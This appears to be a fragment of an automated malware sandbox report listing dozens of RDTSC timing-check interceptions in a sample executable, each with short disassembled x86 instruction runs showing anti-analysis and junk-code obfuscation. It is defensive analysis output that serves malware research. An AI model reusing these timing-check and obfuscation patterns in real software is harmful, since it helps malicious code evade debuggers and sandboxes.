Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: E7206E second address: E7208A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 jmp 00007FAAAD0E3C64h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: E68012 second address: E68016 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: E68016 second address: E6802B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FAAAD0E3C5Dh 0x0000000d rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: E72A56 second address: E72A5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: E72B8B second address: E72BCA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAAD0E3C60h 0x00000007 jmp 00007FAAAD0E3C67h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jmp 00007FAAAD0E3C5Eh 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: E72BCA second address: E72BCE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: E73048 second address: E73053 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push edx 0x0000000a pop edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: E73053 second address: E73059 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: E73059 second address: E7306D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FAAAD0E3C5Fh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: E76743 second address: E76764 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FAAACBBF207h 0x00000009 jns 00007FAAACBBF1F6h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: E76764 second address: E76768 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: E7A00E second address: E7A018 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FAAACBBF1F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: E7FB5C second address: E7FB60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: E7FB60 second address: E7FB7D instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007FAAACBBF1FDh 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jnc 00007FAAACBBF1F6h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: E7FB7D second address: E7FBC1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAAD0E3C5Dh 0x00000007 jmp 00007FAAAD0E3C67h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jbe 00007FAAAD0E3C6Ch 0x00000014 jmp 00007FAAAD0E3C66h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: E3FF0A second address: E3FF0E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: E3FF0E second address: E3FF12 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: E7F736 second address: E7F73A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: E81A01 second address: E81A08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: E81AD1 second address: E81AD7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: E82833 second address: E82838 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: E82955 second address: E8295B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: E8295B second address: E82976 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FAAAD0E3C56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FAAAD0E3C5Bh 0x00000015 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: E82976 second address: E82984 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FAAACBBF1F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: E83112 second address: E83118 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: E83118 second address: E8311C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: E8311C second address: E8316F instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b push 00000000h 0x0000000d push 00000000h 0x0000000f push ecx 0x00000010 call 00007FAAAD0E3C58h 0x00000015 pop ecx 0x00000016 mov dword ptr [esp+04h], ecx 0x0000001a add dword ptr [esp+04h], 00000017h 0x00000022 inc ecx 0x00000023 push ecx 0x00000024 ret 0x00000025 pop ecx 0x00000026 ret 0x00000027 mov edi, dword ptr [ebp+12A32BC3h] 0x0000002d push 00000000h 0x0000002f call 00007FAAAD0E3C5Dh 0x00000034 add dword ptr [ebp+12BB539Eh], eax 0x0000003a pop esi 0x0000003b xchg eax, ebx 0x0000003c push eax 0x0000003d push edx 0x0000003e push edx 0x0000003f jng 00007FAAAD0E3C56h 0x00000045 pop edx 0x00000046 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: E8316F second address: E83181 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FAAACBBF1F8h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: E83B50 second address: E83BFC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007FAAAD0E3C69h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov dword ptr [esp], eax 0x00000010 mov dword ptr [ebp+12BB6512h], eax 0x00000016 push 00000000h 0x00000018 push 00000000h 0x0000001a push eax 0x0000001b call 00007FAAAD0E3C58h 0x00000020 pop eax 0x00000021 mov dword ptr [esp+04h], eax 0x00000025 add dword ptr [esp+04h], 00000014h 0x0000002d inc eax 0x0000002e push eax 0x0000002f ret 0x00000030 pop eax 0x00000031 ret 0x00000032 jnc 00007FAAAD0E3C61h 0x00000038 pushad 0x00000039 movsx ecx, dx 0x0000003c popad 0x0000003d push 00000000h 0x0000003f call 00007FAAAD0E3C5Bh 0x00000044 or dword ptr [ebp+12A33769h], eax 0x0000004a pop edi 0x0000004b xchg eax, ebx 0x0000004c pushad 0x0000004d push edi 0x0000004e pushad 0x0000004f popad 0x00000050 pop edi 0x00000051 jne 00007FAAAD0E3C58h 0x00000057 popad 0x00000058 push eax 0x00000059 pushad 0x0000005a jmp 00007FAAAD0E3C65h 0x0000005f pushad 0x00000060 jmp 00007FAAAD0E3C61h 0x00000065 push eax 0x00000066 push edx 0x00000067 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: E83A35 second address: E83A48 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAACBBF1FFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: E83A48 second address: E83A4D instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: E86BDA second address: E86BE7 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FAAACBBF1F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: E875CF second address: E875D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: E875D3 second address: E875F9 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FAAACBBF1F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a js 00007FAAACBBF1F8h 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 popad 0x00000013 push eax 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 jmp 00007FAAACBBF1FEh 0x0000001c pop eax 0x0000001d rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: E8C898 second address: E8C89C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: E8E96B second address: E8E982 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FAAACBBF1FCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push edi 0x00000010 pop edi 0x00000011 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: E8E982 second address: E8E988 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: E8FAA8 second address: E8FB16 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FAAACBBF1F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov dword ptr [esp], eax 0x0000000e mov dword ptr [ebp+12BBC993h], ecx 0x00000014 push 00000000h 0x00000016 push 00000000h 0x00000018 push ebp 0x00000019 call 00007FAAACBBF1F8h 0x0000001e pop ebp 0x0000001f mov dword ptr [esp+04h], ebp 0x00000023 add dword ptr [esp+04h], 00000014h 0x0000002b inc ebp 0x0000002c push ebp 0x0000002d ret 0x0000002e pop ebp 0x0000002f ret 0x00000030 movzx ebx, dx 0x00000033 movsx edi, dx 0x00000036 push 00000000h 0x00000038 push 00000000h 0x0000003a push esi 0x0000003b call 00007FAAACBBF1F8h 0x00000040 pop esi 0x00000041 mov dword ptr [esp+04h], esi 0x00000045 add dword ptr [esp+04h], 00000014h 0x0000004d inc esi 0x0000004e push esi 0x0000004f ret 0x00000050 pop esi 0x00000051 ret 0x00000052 movsx ebx, bx 0x00000055 push eax 0x00000056 push eax 0x00000057 push edx 0x00000058 jmp 00007FAAACBBF202h 0x0000005d rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: E92AC9 second address: E92AE3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAAD0E3C66h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: E93AB3 second address: E93AF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FAAACBBF1F6h 0x0000000a popad 0x0000000b popad 0x0000000c push eax 0x0000000d jmp 00007FAAACBBF1FBh 0x00000012 nop 0x00000013 jmp 00007FAAACBBF1FAh 0x00000018 push 00000000h 0x0000001a and edi, dword ptr [ebp+12A334E9h] 0x00000020 push 00000000h 0x00000022 jnl 00007FAAACBBF1FBh 0x00000028 push eax 0x00000029 push eax 0x0000002a push edx 0x0000002b push eax 0x0000002c push edx 0x0000002d push eax 0x0000002e push edx 0x0000002f rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: E93AF2 second address: E93AF6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: E93AF6 second address: E93AFC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: E94986 second address: E94A06 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jne 00007FAAAD0E3C56h 0x00000009 jmp 00007FAAAD0E3C68h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 jnp 00007FAAAD0E3C66h 0x00000018 jmp 00007FAAAD0E3C60h 0x0000001d nop 0x0000001e push 00000000h 0x00000020 push eax 0x00000021 call 00007FAAAD0E3C58h 0x00000026 pop eax 0x00000027 mov dword ptr [esp+04h], eax 0x0000002b add dword ptr [esp+04h], 0000001Bh 0x00000033 inc eax 0x00000034 push eax 0x00000035 ret 0x00000036 pop eax 0x00000037 ret 0x00000038 and edi, dword ptr [ebp+12A31A16h] 0x0000003e push 00000000h 0x00000040 add ebx, 5CB4B79Ch 0x00000046 push 00000000h 0x00000048 xor dword ptr [ebp+12A3349Fh], ebx 0x0000004e xchg eax, esi 0x0000004f push eax 0x00000050 push edx 0x00000051 jns 00007FAAAD0E3C58h 0x00000057 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: E95A90 second address: E95A94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: E96B30 second address: E96B4A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAAD0E3C66h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: E96B4A second address: E96B50 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: E96B50 second address: E96B54 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: E89EA8 second address: E89EB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: E8CA19 second address: E8CA1F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: E8EB83 second address: E8EB88 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: E90D3B second address: E90D3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: E91D4A second address: E91D54 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FAAACBBF1F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: E93C6F second address: E93D1D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push ebp 0x0000000b call 00007FAAAD0E3C58h 0x00000010 pop ebp 0x00000011 mov dword ptr [esp+04h], ebp 0x00000015 add dword ptr [esp+04h], 0000001Ah 0x0000001d inc ebp 0x0000001e push ebp 0x0000001f ret 0x00000020 pop ebp 0x00000021 ret 0x00000022 jmp 00007FAAAD0E3C5Dh 0x00000027 push dword ptr fs:[00000000h] 0x0000002e call 00007FAAAD0E3C63h 0x00000033 jnl 00007FAAAD0E3C58h 0x00000039 pop ebx 0x0000003a mov dword ptr fs:[00000000h], esp 0x00000041 jl 00007FAAAD0E3C5Ah 0x00000047 mov di, CD2Dh 0x0000004b mov eax, dword ptr [ebp+12A312D5h] 0x00000051 mov edi, dword ptr [ebp+12A33711h] 0x00000057 push FFFFFFFFh 0x00000059 movsx edi, ax 0x0000005c nop 0x0000005d jnc 00007FAAAD0E3C6Bh 0x00000063 push eax 0x00000064 push eax 0x00000065 push edx 0x00000066 jmp 00007FAAAD0E3C63h 0x0000006b rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: E95CB1 second address: E95CD3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 pushad 0x00000007 jmp 00007FAAACBBF207h 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: E9BC89 second address: E9BC8D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: E89EB1 second address: E89EB5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: E8EB88 second address: E8EBAE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FAAAD0E3C69h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: E91D54 second address: E91D5E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007FAAACBBF1F6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: E89EB5 second address: E89EC2 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: E89EC2 second address: E89EC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: E35D44 second address: E35D55 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAAD0E3C5Bh 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: E35D55 second address: E35D5B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: E35D5B second address: E35D6A instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jo 00007FAAAD0E3C56h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: E35D6A second address: E35DA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FAAACBBF1F6h 0x0000000a jmp 00007FAAACBBF1FDh 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 jp 00007FAAACBBF21Bh 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007FAAACBBF207h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: EAFDC9 second address: EAFDFD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAAD0E3C5Eh 0x00000007 push ecx 0x00000008 push edi 0x00000009 pop edi 0x0000000a jmp 00007FAAAD0E3C64h 0x0000000f pop ecx 0x00000010 pop edx 0x00000011 pop eax 0x00000012 pushad 0x00000013 push edx 0x00000014 jg 00007FAAAD0E3C56h 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: EAFDFD second address: EAFE12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 jng 00007FAAACBBF1F6h 0x0000000c push esi 0x0000000d pop esi 0x0000000e pushad 0x0000000f popad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 push ecx 0x00000014 pop ecx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: EAFE12 second address: EAFE20 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jo 00007FAAAD0E3C5Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: EB070D second address: EB0711 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: EB563E second address: EB564A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 je 00007FAAAD0E3C56h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: EB564A second address: EB5676 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAACBBF1FEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c push edi 0x0000000d jmp 00007FAAACBBF205h 0x00000012 pop edi 0x00000013 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: EB4377 second address: EB439C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAAD0E3C5Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jnl 00007FAAAD0E3C56h 0x00000011 jmp 00007FAAAD0E3C5Ah 0x00000016 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: EB439C second address: EB43A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: EB43A0 second address: EB43A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: EB43A9 second address: EB43B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: EB43B6 second address: EB43C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FAAAD0E3C56h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: EB43C0 second address: EB43D1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAACBBF1FDh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: EB51B7 second address: EB51FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jo 00007FAAAD0E3C61h 0x0000000b jmp 00007FAAAD0E3C5Bh 0x00000010 jno 00007FAAAD0E3C5Eh 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007FAAAD0E3C62h 0x0000001e je 00007FAAAD0E3C5Ch 0x00000024 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: EB51FC second address: EB5207 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnl 00007FAAACBBF1F6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: EB5207 second address: EB520D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: EB520D second address: EB5217 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ecx 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: EB5370 second address: EB5376 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
